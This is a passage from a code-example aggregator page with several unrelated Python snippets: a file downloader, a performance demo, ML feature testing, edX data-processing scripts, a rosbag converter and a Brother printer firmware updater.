                        if ticker:
                            sys.stdout.write("]\n")
                            sys.stdout.flush()
            except: # apparently a problem
                if os.path.exists(downloadPath):
                    # don't let a bad file sit around
                    try:
                        os.remove(downloadPath)
                    except:
                        pass
                print "problem downloading " + url
                raise
            else:
                print "done downloading " + url
            finally:
                try:
                    # close connection to server
                    os.close(urlFileLikeObject)
                except:
                    pass
                try:
                    # delete semaphore file
                    os.remove(semaphorePath)
                except:
                    pass
        if os.path.exists(downloadPath):
            # file exists now, assume it is good
            return downloadPath
        else:
            # apparently download has failed
            raise IOError("file not found " + downloadPath)

Example 39

Project: write-pythonic-code-demos Source File: _01_perf.py
def main():
    # #############################
    print("Creating data...", end=' ')
    sys.stdout.flush()

    data_list = []  # 500,000 DataPoint items
    random.seed(0)
    for d_id in range(500000):
        x = random.randint(0, 1000)
        y = random.randint(0, 1000)
        temp = random.randint(-10, 50)
        quality = random.random()
        data_list.append(DataPoint(d_id, x, y, temp, quality))

    print("done.")
    sys.stdout.flush()

    # Reordering data for random access
    print("Reordering data for random access ...", end=' ')
    sys.stdout.flush()

    data_list.sort(key=lambda d: d.quality)

    print("done.")

    # Create a set of random IDs to locate without duplication
    interesting_ids = {random.randint(0, len(data_list)) for _ in range(0, 100)}
    print("Creating {} interesting IDs to seek.".format(len(interesting_ids)))

    # Locating data in list
    print("Locating data in list...", end=' ')
    sys.stdout.flush()

    t0 = datetime.datetime.now()
    interesting_points = []
    for i in interesting_ids:
        pt = find_point_by_id_in_list(data_list, i)
        interesting_points.append(pt)

    t1 = datetime.datetime.now()
    dt_list = (t1 - t0).total_seconds()

    print("done.")
    sys.stdout.flush()

    print("dt: {} sec".format(dt_list))
    print(interesting_points)

    # #############################

    # let's try this with a dictionary...
    # 1. Create dictionary via comprehension, key = id

    t0 = datetime.datetime.now()
    data_dict = {d.id: d for d in data_list}

    # 2. locate the data in dictionary
    interesting_points.clear()
    for d_id in interesting_ids:
        d = data_dict[d_id]
        interesting_points.append(d)

    t1 = datetime.datetime.now()
    dt_dict = (t1 - t0).total_seconds()

    print("done.")
    sys.stdout.flush()

    print("dt: {} sec".format(dt_dict))
    print(interesting_points)
    print()
    print("Speedup from dict: {:,.0f}x".format(round(dt_list / dt_dict)))

Example 40

Project: beacon-ml Source File: deep-learning.py
def main():
  if not os.path.exists(RESULTS_DIR):
    os.makedirs(RESULTS_DIR)

  # then run to to generate the vectorized data from the raw dump (already done)
  if REGEN_DATA or \
      not os.path.exists(VECTOR_DATA_PATH) or \
      not os.path.exists(VECTOR_LABELS_PATH) or \
      not os.path.exists(VALUE_RANGES_PATH):
    print 'Re-generating data'
    csv_fname = os.path.join(DATA_DIR, CSV_FNAME)
    sys.stdout.flush()
    data, labels, ranges = subsample_and_vectorize_data(csv_fname, LABEL, PRETTY_PRINT_LABEL)
    with open(VECTOR_DATA_PATH, 'wb') as file:
      np.save(file, data)
    data = None
    with open(VECTOR_LABELS_PATH, 'wb') as file:
      np.save(file, labels)
    labels = None
    with open(VALUE_RANGES_PATH, 'wb') as file:
      json.dump(ranges, file, indent=4)
    ranges = None

  features = load_feature_names()
  (x_train_full, y_train), (x_val_full, y_val) = prepare_data()
  train_rows, train_cols = x_train_full.shape
  val_rows, val_cols = x_val_full.shape

  # Figure out how many columns we need for the known starting features
  fname = os.path.join(RESULTS_DIR, PRETTY_PRINT_LABEL + '_accuracy_test')
  base_columns = 0;
  for name in starting_features:
    if name in features:
      fname += "." + name
      base_columns += features[name]['end'] - features[name]['start'] + 1
  fname += ".csv"

  # Try training each feature against the data set individually
  feature_count = len(features)
  feature_num = 0
  with open(fname, 'wb', 1) as out:
    for name, feature in features.iteritems():
      if not len(test_features) or name in test_features:
        feature_num += 1

        #Build an input data set with just the columns we care about
        count = feature['end'] - feature['start'] + 1
        x_train = np.zeros((train_rows, base_columns + count))
        x_val = np.zeros((val_rows, base_columns + count))
        col = 0
        # Populate the starting features
        for n in starting_features:
          if n == name:
            continue
          if n in features:
            for column in xrange(features[n]['start'], features[n]['end'] + 1):
              x_train[:, col] = x_train_full[:, column]
              x_val[:, col] = x_val_full[:, column]
              col += 1
        # Populate the features we are testing
        for column in xrange(feature['start'], feature['end'] + 1):
          x_train[:,col] = x_train_full[:,column]
          x_val[:, col] = x_val_full[:, column]
          col += 1

        # normalize the data
        scaler = StandardScaler()
        x_train = scaler.fit_transform(x_train)
        x_val = scaler.transform(x_val)

        # Run the actual training
        print '[{0:d}/{1:d}] Training deep model on {2} ({3:d} columns)'.format(feature_num, feature_count, name, col)
        sys.stdout.flush()
        acc, model = train_deep_model(x_train, y_train, x_val, y_val)
        print '{0} Accuracy: {1:0.4f}'.format(name, acc)
        sys.stdout.flush()
        out.write('{0},{1:0.4f}\n'.format(name,acc))

        # Test the varous values for the feature
        if len(test_features):
          max_val = 100000
          min_val = 100
          step_size = 100
          count = (max_val - min_val) / step_size
          original_values = np.array([[0.0]] * count)
          row = 0
          for value in xrange(100, 100000, 100):
            original_values[row] = value
            row += 1
          data = scaler.transform(original_values)
          prob = model.predict_proba(data, verbose=0)
          with open(os.path.join(RESULTS_DIR, PRETTY_PRINT_LABEL + '_values_' + name), 'wb') as v:
            for row in xrange(0, count):
              value = original_values[row][0]
              probability = prob[row][0]
              v.write('{0:d},{1:f}\n'.format(int(value), probability))

Example 41

Project: edx2bigquery Source File: make_forum_analysis.py
def CreateForumPerson( course_id, force_recompute=False, use_dataset_latest=False, skip_last_day=False, end_date=None, has_hash_limit=False, hash_limit=HASH ):
    '''
    Create Forum Person table, based on forum events and forum posts tables. 
    This table contains both read and writes for all forum posts, for all users.
    '''

    dataset = bqutil.course_id2dataset(course_id, use_dataset_latest=use_dataset_latest)
    table = TABLE_FORUM_PERSON

    original_the_sql = """

                  SELECT (case when PP.username_fp is not null then PP.username_fp else FE.username_fe end) as username,
			 "{course_id}" as course_id,
                         (case when PP.username_fp is not null then PP.slug_id else FE.slug_id end) as slug_id,
                         (case when PP.username_fp is not null then PP.slug_type else FE.slug_type end) as slug_type,
                         (case when PP.username_fp is not null then PP.thread_id else FE.thread_id end) as thread_id,
                         (case when PP.username_fp is not null then PP.parent_id else FE.parent_id end) as parent_id,
                         (case when PP.original_poster is not null then PP.original_poster else FE.original_poster end) as original_poster,
                         (case when PP.responded_to is not null then PP.responded_to else FE.responded_to end) as responded_to,
                         (case when PP.username_fp is not null then PP.title else FE.title end) as title,
                         (case when PP.username_fp is not null then PP.wrote else 0 end) as wrote,
                         FE.read as read,
                         FE.pin as pinned,
                         FE.upvote as upvoted,
                         FE.unvote as unvoted,
                         #FE.del as deleted,
                         FE.follow as followed,
                         (case when PP.first_time is not null and FE.last_time is not null and (TIMESTAMP(PP.first_time) <= TIMESTAMP(FE.last_time))
                                   then TIMESTAMP(PP.first_time)
                               else (case when PP.first_time is not null and FE.last_time is null
                                     then TIMESTAMP(PP.first_time) else
                                         (case when FE.first_time is not null
                                               then TIMESTAMP(FE.first_time)
                                              else FE.last_time end) end) end) as first_time,
                         (case when PP.first_time is not null and FE.last_time is not null and (TIMESTAMP(PP.first_time) >= TIMESTAMP(FE.last_time))
                                   then TIMESTAMP(PP.first_time)
                               else (case when PP.first_time is not null and FE.last_time is null
                                     then TIMESTAMP(PP.first_time) else
                                         (case when FE.last_time is not null
                                               then TIMESTAMP(FE.last_time)
                                              else FE.first_time end) end) end) as last_time,


                  FROM
                  (
                          # Find 1st level posting => "original_post"
                          SELECT username as username_fp,
                                 slug_id,
                                 slug_type,
                                 thread_id,
                                 parent_id,
                                 original_poster,
                                 responded_to,
                                 title,
                                 1 as wrote,
                                 #created_at as first_time,
                                 first_time
                          FROM [{dataset}.{forum_posts}]
                          {hash_limit_where}
                          ORDER by username_fp, first_time
                  ) PP
                  FULL OUTER JOIN EACH
                  (
                          SELECT username as username_fe, 
                                 MIN(TIMESTAMP(time)) as first_time,
                                 MAX(TIMESTAMP(time)) as last_time,
                                 slug_id,
                                 FE.thread_id as thread_id,
                                 FIRST(parent_id) as parent_id,
				 F.slug_type as slug_type,
				 F.original_poster as original_poster,
				 F.responded_to as responded_to,
				 F.title as title,
                                 #1 as read,
                                 sum(case when forum_action = "read" or forum_action = "read_inline" then 1 else 0 end) as read,
                                 sum(case when forum_action = "pin" then 1 else 0 end) as pin,
                                 sum(case when forum_action = "upvote" then 1 else 0 end) as upvote,
                                 sum(case when forum_action = "unvote" then 1 else 0 end) as unvote,
                                 #sum(case when forum_action = "delete" then 1 else 0 end) as del,
                                 sum(case when forum_action = "follow_thread" then 1 else 0 end) as follow,      
                          FROM [{dataset}.{forum_events}] FE
                          JOIN EACH 
                          (
                                 SELECT username as username_fe,
                                        slug_id,
                                        slug_type,
                                        thread_id,
                                        parent_id,
                                        original_poster,
                                        responded_to,
                                        title,
                                        first_time,
                                 FROM [{dataset}.{forum_posts}]
                                 {hash_limit_where}
                          ) as F
                          ON F.thread_id = FE.thread_id
                          WHERE ((FE.forum_action = "read") or 
                                (FE.forum_action = "read_inline") or
                                (FE.forum_action = "pin") or 
                                (FE.forum_action = "upvote") or 
                                (FE.forum_action = "unvote") or
                                #(FE.forum_action = "delete") or
                                (FE.forum_action = "follow_thread"))
                                {hash_limit_and}
                          GROUP BY username_fe, slug_id, thread_id, slug_type, original_poster, responded_to, title
                  ) as FE
                  ON (PP.username_fp = FE.username_fe) AND (PP.slug_id = FE.slug_id)
                  WHERE (PP.username_fp is not null and PP.username_fp != '') or (FE.username_fe is not null and FE.username_fe != '')

              """

    the_sql = original_the_sql.format( dataset=dataset, course_id=course_id, forum=TABLE_FORUM, forum_posts=TABLE_FORUM_POSTS, forum_events=TABLE_FORUM_EVENTS, hash_limit_and='', hash_limit_where='' )

    print "[make_forum_analysis] Creating %s.%s table for %s" % (dataset, TABLE_FORUM_PERSON, course_id)
    sys.stdout.flush()

    try:

        tinfo_fe = bqutil.get_bq_table_info( dataset, TABLE_FORUM_EVENTS )
        trows_fe = int(tinfo_fe['numRows'])
	print "[make_forum_analysis] %s Forum Events found " % trows_fe
        tinfo_fp = bqutil.get_bq_table_info( dataset, TABLE_FORUM_POSTS )
        trows_fp = int(tinfo_fp['numRows'])
	print "[make_forum_analysis] %s Forum Posts found " % trows_fp

        assert tinfo_fe is not None and trows_fe != 0, "[make_forum_analysis] %s table depends on %s, which does not exist" % ( TABLE_FORUM_PERSON, TABLE_FORUM_EVENTS )
        assert tinfo_fp is not None and trows_fp != 0, "[make_forum_analysis] %s table depends on %s, which does not exist" % ( TABLE_FORUM_PERSON, TABLE_FORUM_POSTS ) 

    except (AssertionError, Exception) as err:

        print " --> Err: missing %s.%s and/or %s (including 0 rows in table)?  Skipping creation of %s" % ( dataset, TABLE_FORUM_POSTS, TABLE_FORUM_EVENTS, TABLE_FORUM_PERSON )
        sys.stdout.flush()
        return

    # Now try to create table
    try:

        if has_hash_limit:

            overwrite = True
            hash_limit = int( hash_limit )
            for k in range( hash_limit ):
                hash_limit_where = "WHERE ABS(HASH(username)) %% %d = %d" % ( hash_limit, k )
                hash_limit_and = "and ABS(HASH(username)) %% %d = %d" % ( hash_limit, k )

                retry_the_sql = original_the_sql.format( dataset=dataset, forum=TABLE_FORUM, forum_posts=TABLE_FORUM_POSTS, forum_events=TABLE_FORUM_EVENTS, hash_limit_and=hash_limit_and, hash_limit_where=hash_limit_where )
                print "[make_forum_analysis] Retrying with this query...", retry_the_sql
                sys.stdout.flush()
                bqutil.create_bq_table( dataset, table, retry_the_sql, wait=True, overwrite=overwrite, allowLargeResults=True )
                overwrite = "append"

        else:

	    overwrite = True
            bqutil.create_bq_table(dataset, table, the_sql, wait=True, overwrite=overwrite, allowLargeResults=True)

    except Exception as err:

        has_hash_limit = True
        if ( (('Response too large to return.' in str(err)) or ('Resources exceeded during query execution' in str(err))) and has_hash_limit ):

            # 'Resources exceeded during query execution'
            # try using hash limit on username
            # e.g. WHERE ABS(HASH(username)) % 4 = 0
            print '[make_forum_analysis] Response too large to return. Attempting to break down into multiple queries and append instead... using hash of %s' % hash_limit

            try:

                for k in range( hash_limit ):

		    hash_limit_where = "WHERE ABS(HASH(username)) %% %d = %d" % ( hash_limit, k )
		    hash_limit_and = "and ABS(HASH(username)) %% %d = %d" % ( hash_limit, k )

                    retry_the_sql = original_the_sql.format( dataset=dataset, forum=TABLE_FORUM, forum_posts=TABLE_FORUM_POSTS, forum_events=TABLE_FORUM_EVENTS, hash_limit_and=hash_limit_and, hash_limit_where=hash_limit_where )
                    print "[make_forum_analysis] Retrying with this query...", retry_the_sql
                    sys.stdout.flush()
                    bqutil.create_bq_table( dataset, table, retry_the_sql, wait=True, overwrite=overwrite, allowLargeResults=True )
                    overwrite = "append"
  
            except Exception as err:

                if ( (('Response too large to return.' in str(err)) or ('Resources exceeded during query execution' in str(err))) and has_hash_limit ):

                    hash_limit = int( hash_limit * 2.0 )
                    print '[make_forum_analysis] Response too large to return. Attempting to break down into multiple queries and append instead... using hash of %s' % hash_limit
                    CreateForumPerson( course_id, force_recompute, use_dataset_latest, skip_last_day, end_date, has_hash_limit=True, hash_limit=hash_limit )

                else:

                    print '[make_forum_analysis] An error occurred with this query: %s' % the_sql
                    raise

        else:

	    print '[make_forum_analysis] An error occurred with this query: %s' % the_sql
            raise

    print "Done with Forum Person for %s (end %s)"  % (course_id, datetime.datetime.now())
    print "="*77
    sys.stdout.flush()

    return

Example 42

Project: udacity-driving-reader Source File: bagdump.py
def main():
    parser = argparse.ArgumentParser(description='Convert rosbag to images and csv.')
    parser.add_argument('-o', '--outdir', type=str, nargs='?', default='/output',
        help='Output folder')
    parser.add_argument('-i', '--indir', type=str, nargs='?', default='/data',
        help='Input folder where bagfiles are located')
    parser.add_argument('-f', '--img_format', type=str, nargs='?', default='jpg',
        help='Image encode format, png or jpg')
    parser.add_argument('-d', dest='debug', action='store_true', help='Debug print enable')
    parser.set_defaults(debug=False)
    args = parser.parse_args()

    img_format = args.img_format
    base_outdir = args.outdir
    indir = args.indir
    debug_print = args.debug

    bridge = CvBridge()

    include_images = True
    filter_topics = [STEERING_TOPIC, GPS_FIX_TOPIC]
    if include_images:
        filter_topics += CAMERA_TOPICS

    bagsets = find_bagsets(indir, "*.bag", filter_topics)
    for bs in bagsets:
        print("Processing set %s" % bs.name)
        sys.stdout.flush()

        dataset_outdir = os.path.join(base_outdir, "%s" % bs.name)
        left_outdir = get_outdir(dataset_outdir, "left")
        center_outdir = get_outdir(dataset_outdir, "center")
        right_outdir = get_outdir(dataset_outdir, "right")

        camera_cols = ["seq", "timestamp", "width", "height", "frame_id", "filename"]
        camera_dict = defaultdict(list)

        steering_cols = ["seq", "timestamp", "angle", "torque", "speed"]
        steering_dict = defaultdict(list)

        gps_cols = ["seq", "timestamp", "status", "service", "lat", "long", "alt"]
        gps_dict = defaultdict(list)

        bs.write_infos(dataset_outdir)
        readers = bs.get_readers()
        stats_acc = defaultdict(int)

        def _process_msg(topic, msg, stats):
            timestamp = msg.header.stamp.to_nsec()
            if topic in CAMERA_TOPICS:
                outdir = camera_select(topic, (left_outdir, center_outdir, right_outdir))
                if debug_print:
                    print("%s_camera %d" % (topic[1], timestamp))

                results = write_image(bridge, outdir, msg, fmt=img_format)
                results['filename'] = os.path.relpath(results['filename'], dataset_outdir)
                camera2dict(msg, results, camera_dict)
                stats['img_count'] += 1
                stats['msg_count'] += 1

            elif topic == STEERING_TOPIC:
                if debug_print:
                    print("steering %d %f" % (timestamp, msg.steering_wheel_angle))

                steering2dict(msg, steering_dict)
                stats['msg_count'] += 1

            elif topic == GPS_FIX_TOPIC:
                if debug_print:
                    print("gps      %d %d, %d" % (timestamp, msg.latitude, msg.longitude))

                gps2dict(msg, gps_dict)
                stats['msg_count'] += 1

        # no need to cycle through readers in any order for dumping, rip through each on in sequence
        for reader in readers:
            for result in reader.read_messages():
                _process_msg(*result, stats=stats_acc)
                if stats_acc['img_count'] % 1000 == 0 or stats_acc['msg_count'] % 5000 == 0:
                    print("%d images, %d messages processed..." %
                          (stats_acc['img_count'], stats_acc['msg_count']))
                    sys.stdout.flush()

        print("Writing done. %d images, %d messages processed." %
              (stats_acc['img_count'], stats_acc['msg_count']))
        sys.stdout.flush()

        camera_csv_path = os.path.join(dataset_outdir, 'camera.csv')
        camera_df = pd.DataFrame(data=camera_dict, columns=camera_cols)
        camera_df.to_csv(camera_csv_path, index=False)

        steering_csv_path = os.path.join(dataset_outdir, 'steering.csv')
        steering_df = pd.DataFrame(data=steering_dict, columns=steering_cols)
        steering_df.to_csv(steering_csv_path, index=False)

        gps_csv_path = os.path.join(dataset_outdir, 'gps.csv')
        gps_df = pd.DataFrame(data=gps_dict, columns=gps_cols)
        gps_df.to_csv(gps_csv_path, index=False)

        gen_interpolated = True
        if gen_interpolated:
            # A little pandas magic to interpolate steering/gps samples to camera frames
            camera_df['timestamp'] = pd.to_datetime(camera_df['timestamp'])
            camera_df.set_index(['timestamp'], inplace=True)
            camera_df.index.rename('index', inplace=True)
            steering_df['timestamp'] = pd.to_datetime(steering_df['timestamp'])
            steering_df.set_index(['timestamp'], inplace=True)
            steering_df.index.rename('index', inplace=True)
            gps_df['timestamp'] = pd.to_datetime(gps_df['timestamp'])
            gps_df.set_index(['timestamp'], inplace=True)
            gps_df.index.rename('index', inplace=True)

            merged = functools.reduce(lambda left, right: pd.merge(
                left, right, how='outer', left_index=True, right_index=True), [camera_df, steering_df, gps_df])
            merged.interpolate(method='time', inplace=True)

            filtered_cols = ['timestamp', 'width', 'height', 'frame_id', 'filename',
                             'angle', 'torque', 'speed',
                             'lat', 'long', 'alt']
            filtered = merged.loc[camera_df.index]  # back to only camera rows
            filtered.fillna(0.0, inplace=True)
            filtered['timestamp'] = filtered.index.astype('int')  # add back original timestamp integer col
            filtered['width'] = filtered['width'].astype('int')  # cast back to int
            filtered['height'] = filtered['height'].astype('int')  # cast back to int
            filtered = filtered[filtered_cols]  # filter and reorder columns for final output

            interpolated_csv_path = os.path.join(dataset_outdir, 'interpolated.csv')
            filtered.to_csv(interpolated_csv_path, header=True)

Example 43

Project: edx2bigquery Source File: make_user_info_combo.py
def process_file(course_id, basedir=None, datedir=None, use_dataset_latest=False):

    basedir = path(basedir or '')
    course_dir = course_id.replace('/','__')
    lfp = find_course_sql_dir(course_id, basedir, datedir, use_dataset_latest=use_dataset_latest)

    cdir = lfp
    print "Processing %s from files in %s" % (course_id, cdir)
    sys.stdout.flush()

    mypath = os.path.dirname(os.path.realpath(__file__))
    SCHEMA_FILE = '%s/schemas/schema_user_info_combo.json' % mypath
    
    the_dict_schema = schema2dict(json.loads(open(SCHEMA_FILE).read())['user_info_combo'])
    
    uic = defaultdict(dict)		# dict with key = user_id, and val = dict to be written out as JSON line
    
    def copy_elements(src, dest, fields, prefix="", skip_empty=False):
        for key in fields:
            if skip_empty and (not key in src):
                src[key] = None
            if src[key]=='NULL':
                continue
            if key=='course_id' and src[key].startswith('course-v1:'):
                # special handling for mangled "opaque keys" version of course_id, e.g. course-v1:MITx+6.00.2x_3+1T2015
                src[key] = src[key].split(':',1)[1].replace('+','/')
            dest[prefix + key] = src[key]
    
    def openfile(fn_in, mode='r', add_dir=True):
        if add_dir:
            fn = cdir / fn_in
        else:
            fn = fn_in
        if (not os.path.exists(fn)) and (not fn.endswith('.gz')):
            fn += ".gz"
        if mode=='r' and not os.path.exists(fn):
            newfn = convert_sql(fn)		# try converting from *.sql file, if that exists
            if not newfn:
                return None			# failure, no file found, return None
            fn = newfn
        if fn.endswith('.gz'):
            return gzip.GzipFile(fn, mode)
        return open(fn, mode)
    
    def tsv2csv(fn_in, fn_out):
        import csv
        fp = openfile(fn_out, 'w', add_dir=False)
        csvfp = csv.writer(fp)
        for line in openfile(fn_in, add_dir=False):
            csvfp.writerow(line[:-1].split('\t'))
        fp.close()
    
    def convert_sql(fnroot):
        '''
        Returns filename if suitable file exists or was created by conversion of tab separated values to comma separated values.
        Returns False otherwise.
        '''
        if fnroot.endswith('.gz'):
            fnroot = fnroot[:-3]
        if fnroot.endswith('.csv'):
            fnroot = fnroot[:-4]
        if os.path.exists(fnroot + ".csv"):
            return fnroot + ".csv"
        if os.path.exists(fnroot + ".csv.gz"):
            return fnroot + ".csv.gz"
        if os.path.exists(fnroot + ".sql") or os.path.exists(fnroot + ".sql.gz"):
            infn = fnroot + '.sql'
            outfn = fnroot + '.csv.gz'
            print "--> Converting %s to %s" % (infn, outfn)
            tsv2csv(infn, outfn)
            return outfn
        return False

    nusers = 0
    fields = ['username', 'email', 'is_staff', 'last_login', 'date_joined']
    for line in csv.DictReader(openfile('users.csv')):
        uid = int(line['id'])
        copy_elements(line, uic[uid], fields)
        uic[uid]['user_id'] = uid
        nusers += 1
        uic[uid]['y1_anomalous'] = None
    
    print "  %d users loaded from users.csv" % nusers

    fp = openfile('profiles.csv')
    if fp is None:
        print "--> Skipping profiles.csv, file does not exist"
    else:
        nprofiles = 0
        fields = ['name', 'language', 'location', 'meta', 'courseware', 
                  'gender', 'mailing_address', 'year_of_birth', 'level_of_education', 'goals', 
                  'allow_certificate', 'country', 'city']
        for line in csv.DictReader(fp):
            uid = int(line['user_id'])
            copy_elements(line, uic[uid], fields, prefix="profile_")
            nprofiles += 1
        print "  %d profiles loaded from profiles.csv" % nprofiles
    
    fp = openfile('enrollment.csv')
    if fp is None:
        print "--> Skipping enrollment.csv, file does not exist"
    else:
        nenrollments = 0
        fields = ['course_id', 'created', 'is_active', 'mode', ]
        for line in csv.DictReader(fp):
            uid = int(line['user_id'])
            copy_elements(line, uic[uid], fields, prefix="enrollment_")
            nenrollments += 1
        print "  %d enrollments loaded from profiles.csv" % nenrollments
    
    # see if from_mongodb files are present for this course; if so, merge in that data
    mongodir = cdir.dirname() / 'from_mongodb'
    if mongodir.exists():
        print "--> %s exists, merging in users, profile, and enrollment data from mongodb" % mongodir
        sys.stdout.flush()
        fp = gzip.GzipFile(mongodir / "users.json.gz")
        fields = ['username', 'email', 'is_staff', 'last_login', 'date_joined']
        nadded = 0
        for line in fp:
            pdata = json.loads(line)
            uid = int(pdata['_id'])
            if not uid in uic:
                copy_elements(pdata, uic[uid], fields, skip_empty=True)
                uic[uid]['user_id'] = uid
                nadded += 1
        fp.close()
        print "  %d additional users loaded from %s/users.json.gz" % (nadded, mongodir)
                
        fp = gzip.GzipFile(mongodir / "profiles.json.gz")
        fields = ['name', 'language', 'location', 'meta', 'courseware', 
                  'gender', 'mailing_address', 'year_of_birth', 'level_of_education', 'goals', 
                  'allow_certificate', 'country', 'city']
        nadd_profiles = 0
        def fix_unicode(elem, fields):
            for k in fields:
                if (k in elem) and elem[k]:
                    elem[k] = elem[k].encode('utf8')

        for line in fp:
            pdata = json.loads(line.decode('utf8'))
            uid = int(pdata['user_id'])
            if not uic[uid].get('profile_name', None):
                copy_elements(pdata, uic[uid], fields, prefix="profile_", skip_empty=True)
                fix_unicode(uic[uid], ['profile_name', 'profile_mailing_address', 'profile_goals', 'profile_location', 'profile_language'])
                uic[uid]['y1_anomalous'] = 1
                nadd_profiles += 1
        fp.close()
        print "  %d additional profiles loaded from %s/profiles.json.gz" % (nadd_profiles, mongodir)
                
        # if datedir is specified, then do not add entries from mongodb where the enrollment happened after the datedir cutoff
        cutoff = None
        if datedir:
            cutoff = "%s 00:00:00" % datedir

        fp = gzip.GzipFile(mongodir / "enrollment.json.gz")
        fields = ['course_id', 'created', 'is_active', 'mode', ]
        nadd_enrollment = 0
        n_removed_after_cutoff = 0
        for line in fp:
            pdata = json.loads(line.decode('utf8'))
            uid = int(pdata['user_id'])
            if not uic[uid].get('enrollment_course_id', None):
                if cutoff and (pdata['created'] > cutoff) and (uic[uid].get('y1_anomalous')==1):	# remove if enrolled after datedir cutoff
                    uic.pop(uid)
                    n_removed_after_cutoff += 1
                else:
                    copy_elements(pdata, uic[uid], fields, prefix="enrollment_", skip_empty=True)
                    nadd_enrollment += 1
        fp.close()
        print "  %d additional enrollments loaded from %s/enrollment.json.gz" % (nadd_enrollment, mongodir)

        print "     from mongodb files, added %s (of %s) new users (%s profiles, %s enrollments, %s after cutoff %s)" % (nadded - n_removed_after_cutoff,
                                                                                                                         nadded, nadd_profiles, nadd_enrollment,
                                                                                                                         n_removed_after_cutoff,
                                                                                                                         cutoff)
        sys.stdout.flush()

    fp = openfile('certificates.csv')
    if fp is None:
        print "--> Skipping certificates.csv, file does not exist"
    else:
        for line in csv.DictReader(fp):
            uid = int(line['user_id'])
            fields = ['download_url', 'grade', 'course_id', 'key', 'distinction', 'status', 
                      'verify_uuid', 'download_uuid', 'name', 'created_date', 'modified_date', 'error_reason', 'mode',]
            copy_elements(line, uic[uid], fields, prefix="certificate_")
            if 'user_id' not in uic[uid]:
                uic[uid]['user_id'] = uid
    
    # sanity check for entries with user_id but missing username
    nmissing_uname = 0
    for uid, entry in uic.iteritems():
        if (not 'username' in entry) or (not entry['username']):
            nmissing_uname += 1
            if nmissing_uname < 10:
                print "missing username: %s" % entry
    print "--> %d entries missing username" % nmissing_uname
    sys.stdout.flush()
    
    # sanity check for entries missing course_id
    nmissing_cid = 0
    for uid, entry in uic.iteritems():
        if (not 'enrollment_course_id' in entry) or (not entry['enrollment_course_id']):
            nmissing_cid += 1
            entry['enrollment_course_id'] = course_id
    print "--> %d entries missing enrollment_course_id (all fixed by setting to %s)" % (nmissing_cid, course_id)
    sys.stdout.flush()

    fp = openfile('user_id_map.csv')
    if fp is None:
        print "--> Skipping user_id_map.csv, file does not exist"
    else:
        for line in csv.DictReader(fp):
            uid = int(line['id'])
            fields = ['hash_id']
            copy_elements(line, uic[uid], fields, prefix="id_map_")
    
    # sort by userid
    uidset = uic.keys()
    uidset.sort()
    
    # write out result, checking schema along the way
    
    fieldnames = the_dict_schema.keys()
    ofp = openfile('user_info_combo.json.gz', 'w')
    ocsv = csv.DictWriter(openfile('user_info_combo.csv.gz', 'w'), fieldnames=fieldnames)
    ocsv.writeheader()
    
    for uid in uidset:
        data = uic[uid]
        check_schema(uid, data, the_ds=the_dict_schema, coerce=True)
        if ('enrollment_course_id' not in data) and ('certificate_course_id' not in data):
            print "Oops!  missing course_id in user_info_combo line: inconsistent SQL?"
            print "data = %s" % data
            print "Suppressing this row"
            continue
        row_course_id = data.get('enrollment_course_id', data.get('certificate_course_id', ''))
        if not row_course_id==course_id:
            print "Oops!  course_id=%s in user_info_combo line: inconsistent with expected=%s" % (row_course_id, course_id)
            print "data = %s" % data
            print "Suppressing this row"
            continue
        ofp.write(json.dumps(data) + '\n')
        try:
            ocsv.writerow(data)
        except Exception as err:
            print "failed to write data=%s" % data
            raise
    
    print "Done with make_user_info_combo for %s" % course_id
    sys.stdout.flush()

Example 44

Project: oh-brother Source File: oh-brother.py
def update_firmware(cat, version):
  global password

  print 'Updating %s version %s' % (cat, version)

  # Build XML request info
  xml = ET.ElementTree(ET.fromstring(reqInfo))

  # At least for MFC-J4510DW M1405200717:EFAC (see Internet dumps)
  # and MFC-J4625DW,
  # this element's value is *not* equal to per-firmware cat[egory] value
  # (a "MAIN"-deviating "FIRM" in these cases!),
  # but rather a *fixed* "MAIN" value which is a completely unrelated item,
  # thus I assume this to model-unconditionally have been a BUG
  # (which causes a failure response of the web service request).
  #xml.find('FIRMUPDATETOOLINFO/FIRMCATEGORY').text = cat
  xml.find('FIRMUPDATETOOLINFO/FIRMCATEGORY').text = 'MAIN'

  modelInfo = xml.find('FIRMUPDATEINFO/MODELINFO')
  modelInfo.find('SELIALNO').text = serial
  modelInfo.find('NAME').text = model
  modelInfo.find('SPEC').text = spec

  firm = modelInfo.find('FIRMINFO/FIRM')
  ET.SubElement(firm, 'ID').text = cat
  ET.SubElement(firm, 'VERSION').text = version

  requestInfo = ET.tostring(xml.getroot(), encoding = 'utf8')

  if debug_dump_web_service_request_content:
    print 'request: %s' % requestInfo


  # Request firmware data
  url = 'https://firmverup.brother.co.jp/kne_bh7_update_nt_ssl/ifax2.asmx/' + \
      'fileUpdate'
  hdrs = {'Content-Type': 'text/xml'}

  print 'Looking up printer firmware info at vendor server...'
  sys.stdout.flush()

  import urllib2
  req = urllib2.Request(url, requestInfo, hdrs)
  response = urllib2.urlopen(req)
  response = response.read()

  print 'done'

  if debug_dump_web_service_response_content:
    print 'response: %s' % response

  # Parse response
  xml = ET.fromstring(response)

  if verbose: print_pretty(xml)

  # Check version
  versionCheck = xml.find('FIRMUPDATEINFO/VERSIONCHECK')
  if versionCheck is not None and versionCheck.text == '1':
    print 'Firmware already up to date'
    return


  # Get firmware URL
  firmwareURL = xml.find('FIRMUPDATEINFO/PATH')
  if firmwareURL is None:
    print 'No firmware update info path found'
    sys.exit(1)
  firmwareURL = firmwareURL.text
  filename = firmwareURL.split('/')[-1]


  # Download firmware
  f = open(filename, 'w')

  print 'Downloading firmware file %s from vendor server...' % filename
  sys.stdout.flush()

  req = urllib2.Request(firmwareURL)
  response = urllib2.urlopen(req)

  while True:
      block = response.read(102400)
      if not block: break
      f.write(block)
      sys.stdout.write('.')
      sys.stdout.flush()

  print 'done'
  f.close()

  if show_firmware_upgrade_safety_prompt:
    print 'About to upload the firmware to printer.'
    print 'This is a dangerous action since it is potentially destructive.'
    print 'Thus please double-check / review to ensure that:'
    print '- firmware file version is compatible with your hardware'
    print '- network connection is maximally reliable (strongly prefer wired connection to WLAN)'
    print '- power supply is maximally reliable (may be achieved by using a UPS)'
    raw_input("Press Ctrl-C to prevent firmware upgrade, or possibly Enter to continue...")

  # Get printer password
  if password is None:
    import getpass
    print
    password = getpass.getpass('Enter printer admin password: ')


  # Upload firmware to printer
  from ftplib import FTP

  print 'Now uploading firmware to printer (DO NOT REMOVE POWER!)...'
  sys.stdout.flush()

  ftp = FTP(ip, user = password) # Yes send password as user
  ftp.storbinary('STOR ' + filename, open(filename, 'r'))
